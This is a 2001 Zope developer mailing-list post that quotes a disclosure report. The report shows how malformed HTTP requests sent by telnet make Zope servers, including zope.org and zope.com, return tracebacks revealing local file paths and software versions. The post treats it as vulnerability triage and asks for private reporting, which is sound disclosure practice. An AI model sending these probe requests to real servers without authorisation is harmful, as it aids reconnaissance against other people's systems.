Do others consider this a vulnerability? While it reveals more information than people might want, I'm curious about scenarios under which it could be exploited. If any of you know of something *specific*, meaning it's a genuinely exploitable vulnerability, please email me or Brian Lloyd (brian@zope.com) directly, rather than explain to the world how to do it. --Paul ALife wrote:
Found vulnerability: retrieve a full path to local files in Zope.
---[ Example 1 (Linux):
telnet www.zope.org 80
PROPFIND / HTTP/1.0
F G H J K L HTTP/1.0 500 Internal Server Error Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Mon, 10 Sep 2001 15:38:59 GMT Content-Length: 7058 Ms-Author-Via: DAV Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property Sheets.py Bobo-Exception-Type: TypeError Content-Length: 7058 Ms-Author-Via: DAV Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property Sheets.py Bobo-Exception-Type: TypeError Content-Type: text/html Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional// EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css" type="text/css"> </HEAD> <BODY B Bobo-Exception-Line: 369
...
<!-- Traceback (innermost last): File /usr/local/base/Zope-2.3.2-modified/l ib/python/ZPublisher/Publish.py, line 223, in publish_module File /usr/local/ba se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish F ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i n zpublisher_exception_hook (Object: ApplicationDefaultPermissions) File /us r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p y, line 160, in mapply (Object: PROPFIND) File /usr/local/base/Zope-2.3.2-mo dified/lib/python/ZPublisher/Publish.py, line 112, in call_object (Object: PR OPFIND) File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND (Object: ApplicationDefaultPermissions) File /usr/loc al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply Fi le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i n apply File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d avcmds.py, line 219, in apply File /usr/local/base/Zope-2.3.2-modified/lib/pyth on/webdav/davcmds.py, line 175, in apply File /usr/local/base/Zope-2.3.2-modifi ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop (Object: Virtu al) TypeError: (see above)
--> Host has closed connection.
---[ Example 2 (Linux): telnet www.zope.com 80
GGGG / HTTP/1.0 or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Fri, 21 Sep 2001 12:51:48 GMT Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H TTPResponse.py Content-Type: text/html Bobo-Exception-Type: NotFound Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional// EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css" type="text/css"> </HEAD> <BODY B Content-Length: 5845 Bobo-Exception-Line: 547
< ... >
<!-- Traceback (innermost last): File / usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i n publish_module File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher /Publish.py, line 187, in publish File /usr/local/base/Zope-2.3.2-modified/lib/ python/Zope/__init__.py, line 221, in zpublisher_exception_hook (Object: Appl icationDefaultPermissions) File /usr/local/base/Zope-2.3.2-modified/lib/python/ ZPublisher/Publish.py, line 173, in publish File /usr/local/base/Zope-2.3.2-mod ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody File /usr/loc al/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 547, in notFoundError NotFound: (see above)
--> Host has closed connection.
---[ Example 3 (Win32):
OPTIONS / HTTP/1.0 or NOTREALCOMMAND / HTTP/1.0
HTTP/1.0 404 Not Found Server: Zope/Zope 2.3.2 (binary release, python 1.5.2, win32-x86) ZServer/1.1b1 Date: Mon, 10 Sep 2001 15:06:43 GMT Bobo-Exception-File: D:\INSTOC~1\lib\python\webdav\NullResource.py Bobo-Exception-Type: Not Found Content-Type: text/html Location: http://SERVERNAME Bobo-Exception-Value: bobo exception Content-Length: 756 Bobo-Exception-Line: 122
<html><head><title>::</title></head><body bgcolor="#FFFFFF">
<h2>нЬХАЙЮ!</h2> <p>н ЬХАЙЮ ОПХ ОНОШРЙЕ НОСАКХЙНБЮРЭ ПЕЯСПЯ.</p> <hr noshade> </body></html> <!-- Tracebac k (innermost last): File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 223 , in publish_module File D:\INSTOC~1\lib\python\ZPublisher\Publish.py, line 187 , in publish File D:\INSTOC~1\lib\python\Zope\__init__.py, line 221, in zpublis her_exception_hook (Object: iVirtualHostBase) File D:\INSTOC~1\lib\python\ZP ublisher\Publish.py, line 162, in publish File D:\INSTOC~1\lib\python\ZPublishe r\BaseRequest.py, line 340, in traverse File D:\INSTOC~1\lib\python\webdav\Null Resource.py, line 122, in __bobo_traverse__ (Object: iVirtualHostBase) Not Fou nd: (see above)
--> Host has closed connection.
_______________________________________________ Zope-Dev maillist - Zope-Dev@zope.org http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )